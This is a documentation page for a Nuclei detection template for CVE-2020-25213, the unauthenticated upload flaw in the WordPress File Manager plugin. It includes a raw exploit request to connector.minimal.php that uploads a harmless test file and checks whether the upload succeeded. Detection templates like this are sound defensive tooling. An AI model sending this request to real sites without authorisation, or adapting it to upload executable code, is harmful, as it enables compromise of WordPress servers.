WordPress File Manager Plugin - Remote Code Execution
ID: CVE-2020-25213
Severity: critical
Author: foulenzer
Tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9
Description
Section titled “Description”The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
YAML Source
Section titled “YAML Source”id: CVE-2020-25213
# Uploaded file will be accessible at:-# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txtinfo: name: WordPress File Manager Plugin - Remote Code Execution author: foulenzer severity: critical description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability. reference: - https://plugins.trac.wordpress.org/changeset/2373068 - https://github.com/w4fz5uck5/wp-file-manager-0day - https://nvd.nist.gov/vuln/detail/CVE-2020-25213 - http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html - http://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25213 cwe-id: CWE-434 epss-score: 0.97395 epss-percentile: 0.99916 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: webdesi9 product: file_manager framework: wordpress tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9
http: - raw: - | POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48
--------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid"
17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd"
upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target"
l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]"
1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain
poc-test --------------------------ca81ac1fececda48--
matchers-condition: and matchers: - type: word words: - poc.txt - added condition: and
- type: word part: header words: - application/json
- type: status status: - 200# digest: 4a0a00473045022078f2226f7dbafcd1cd37543a0da0d4885bbb38bc6183d91337af4b384795f5df022100c284d9d51ddb4bd4f8d8e3b81ac2532e510eb4a54deba949cb93b2665951c3cf:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-25213.yaml"